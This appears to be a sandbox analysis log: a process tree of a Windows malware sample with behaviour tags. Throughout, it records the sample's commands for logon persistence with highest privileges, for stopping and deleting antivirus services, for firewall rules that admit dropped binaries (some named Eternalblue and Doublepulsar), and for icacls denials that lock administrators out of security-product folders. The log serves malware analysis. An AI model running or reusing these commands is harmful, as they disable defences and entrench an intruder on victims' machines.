C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
PID:520
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat5⤵
- Drops file in Drivers directory
- System Location Discovery: System Language Discovery
PID:1736
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat5⤵PID:5956
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 5 /NOBREAK6⤵
- Delays execution with timeout.exe
PID:2160
-
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 3 /NOBREAK6⤵
- Delays execution with timeout.exe
PID:5716
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM 1.exe /T /F6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5992
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM P.exe /T /F6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4312
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows6⤵
- Views/modifies file attributes
PID:3016
-
-
-
-
-
C:\programdata\install\ink.exeC:\programdata\install\ink.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4312
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appidsvc3⤵PID:4456
-
C:\Windows\SysWOW64\sc.exesc start appidsvc4⤵
- Launches sc.exe
PID:5324
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appmgmt3⤵PID:3948
-
C:\Windows\SysWOW64\sc.exesc start appmgmt4⤵
- Launches sc.exe
PID:3264
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appidsvc start= auto3⤵PID:3692
-
C:\Windows\SysWOW64\sc.exesc config appidsvc start= auto4⤵
- Launches sc.exe
PID:1716
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appmgmt start= auto3⤵PID:5172
-
C:\Windows\SysWOW64\sc.exesc config appmgmt start= auto4⤵
- Launches sc.exe
PID:2388
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete swprv3⤵
- System Location Discovery: System Language Discovery
PID:6000 -
C:\Windows\SysWOW64\sc.exesc delete swprv4⤵
- Launches sc.exe
PID:5500
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop mbamservice3⤵
- System Location Discovery: System Language Discovery
PID:2224 -
C:\Windows\SysWOW64\sc.exesc stop mbamservice4⤵
- Launches sc.exe
PID:3016
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop bytefenceservice3⤵PID:832
-
C:\Windows\SysWOW64\sc.exesc stop bytefenceservice4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1016
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete bytefenceservice3⤵PID:2460
-
C:\Windows\SysWOW64\sc.exesc delete bytefenceservice4⤵
- Launches sc.exe
PID:316
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete mbamservice3⤵PID:5960
-
C:\Windows\SysWOW64\sc.exesc delete mbamservice4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3884
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete crmsvc3⤵PID:2256
-
C:\Windows\SysWOW64\sc.exesc delete crmsvc4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4184
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete "windows node"3⤵PID:3092
-
C:\Windows\SysWOW64\sc.exesc delete "windows node"4⤵
- Launches sc.exe
PID:5468
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer3⤵
- System Location Discovery: System Language Discovery
PID:1568 -
C:\Windows\SysWOW64\sc.exesc stop Adobeflashplayer4⤵
- Launches sc.exe
PID:3084
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer3⤵PID:5424
-
C:\Windows\SysWOW64\sc.exesc delete AdobeFlashPlayer4⤵
- Launches sc.exe
PID:4372
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop MoonTitle3⤵PID:5256
-
C:\Windows\SysWOW64\sc.exesc stop MoonTitle4⤵
- Launches sc.exe
PID:4884
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete MoonTitle"3⤵PID:3752
-
C:\Windows\SysWOW64\sc.exesc delete MoonTitle"4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:5776
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop AudioServer3⤵PID:5496
-
C:\Windows\SysWOW64\sc.exesc stop AudioServer4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4456
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete AudioServer"3⤵PID:4676
-
C:\Windows\SysWOW64\sc.exesc delete AudioServer"4⤵
- Launches sc.exe
PID:5308
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_643⤵PID:4912
-
C:\Windows\SysWOW64\sc.exesc stop clr_optimization_v4.0.30318_644⤵
- Launches sc.exe
PID:5408
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"3⤵PID:4512
-
C:\Windows\SysWOW64\sc.exesc delete clr_optimization_v4.0.30318_64"4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2192
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql3⤵PID:1280
-
C:\Windows\SysWOW64\sc.exesc stop MicrosoftMysql4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1788
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql3⤵PID:4908
-
C:\Windows\SysWOW64\sc.exesc delete MicrosoftMysql4⤵
- Launches sc.exe
PID:1568
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on3⤵PID:1532
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set allprofiles state on4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1572
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN3⤵PID:5444
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4404
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN3⤵PID:916
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4424
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN3⤵PID:4052
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5900
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN3⤵PID:5808
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5276
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes3⤵PID:5616
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3448
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes3⤵PID:1584
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3272
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes3⤵PID:4044
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3528
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes3⤵PID:1836
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:424
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes3⤵PID:5192
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:652
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes3⤵PID:5984
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3884
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes3⤵PID:3208
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5676
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes3⤵PID:4152
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4468
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes3⤵PID:5060
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3720
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes3⤵
- System Location Discovery: System Language Discovery
PID:2800 -
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1616
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes3⤵PID:1572
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5308
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes3⤵PID:5992
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2416
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN3⤵
- System Location Discovery: System Language Discovery
PID:916 -
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2220
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN3⤵PID:3256
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1436
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out3⤵PID:3500
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:5016
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out3⤵PID:1584
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:5572
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)3⤵PID:4464
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:1016
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)3⤵PID:4044
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:1836
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:1752 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:4468
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)3⤵PID:2460
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:2092
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)3⤵PID:5088
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4820
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)3⤵PID:4596
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4668
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)3⤵PID:5980
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5036
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)3⤵PID:6064
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4976
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)3⤵PID:2300
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5496
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)3⤵PID:3896
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3084
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:264 -
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:2084
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)3⤵PID:4992
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5852
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)3⤵PID:5568
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:2388
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)3⤵PID:1216
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5196
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)3⤵PID:1880
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:6116
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:1096 -
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:5320
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)3⤵PID:5172
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny Admin:(F)4⤵
- Modifies file permissions
PID:3256
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)3⤵PID:5404
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny System:(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:4016
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)3⤵PID:3976
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny Admin:(F)4⤵
- Modifies file permissions
PID:5600
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)3⤵PID:844
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny System:(F)4⤵
- Modifies file permissions
PID:520
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)3⤵PID:1836
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4668
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)3⤵PID:5956
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:2256
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:4736 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4872
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)3⤵PID:4588
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5112
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)3⤵PID:5088
-
C:\Windows\SysWOW64\icacls.exeicacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3252
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:4268 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3692
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)3⤵PID:5324
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5480
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)3⤵PID:5360
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:2416
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)3⤵PID:5568
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:1632
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)3⤵PID:5456
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:4052
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)3⤵PID:3256
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:5396
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)3⤵PID:1016
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:1748
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:1404 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3920
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)3⤵PID:3884
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3044
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)3⤵PID:5980
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3412
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)3⤵PID:3600
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:5476
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)3⤵PID:1360
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:916
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)3⤵PID:5624
-
